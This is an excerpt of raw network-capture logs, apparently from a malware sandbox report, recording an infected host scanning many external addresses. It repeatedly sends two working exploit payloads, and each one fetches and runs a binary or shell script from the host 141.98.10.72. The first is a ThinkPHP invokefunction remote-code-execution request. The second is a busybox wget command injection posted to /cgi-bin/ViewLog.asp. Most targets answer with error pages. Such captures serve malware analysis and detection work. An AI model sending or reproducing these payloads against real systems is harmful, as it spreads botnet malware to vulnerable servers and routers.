                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:32.135920048 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:00.294888020 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.144936894.120.219.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.569776058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.1447720112.168.45.12780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.570465088 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:04.854047060 CET161INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:04 GMT
                                                        Server: WebServer
                                                        Feb 14, 2024 09:33:04.854058981 CET357INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.1446360112.250.107.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.624886990 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:04.963407993 CET335INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.9.7
                                                        Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.7</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.143937094.104.116.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.785271883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.145405694.123.70.198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:05.345432043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.145034862.29.84.268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:05.345474958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.145291285.31.231.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:05.568317890 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:05.794923067 CET970INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Wed, 14 Feb 2024 08:33:05 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 38 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.80</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.143292885.240.107.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:05.571605921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:05.802279949 CET78INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.145395494.121.179.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:05.594794989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.143294085.240.107.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.014066935 CET69INHTTP/1.1 414 Request-URI Too Large
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.145356688.213.229.15980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.161931038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:06.376785040 CET503INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:06 GMT
                                                        Server: Server
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.144471088.198.244.20080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.167737007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:06.385469913 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.143916088.81.88.15180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.169342995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:06.393779039 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:06 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.145339888.216.197.13680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.361974001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:06.561778069 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:33:06 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.145472888.6.1.21980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:06.598272085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.145039294.123.52.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.110929966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.144514895.86.102.08080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.112049103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.145434462.102.246.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.336344004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:08.555197954 CET403INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:33:06 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 193
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
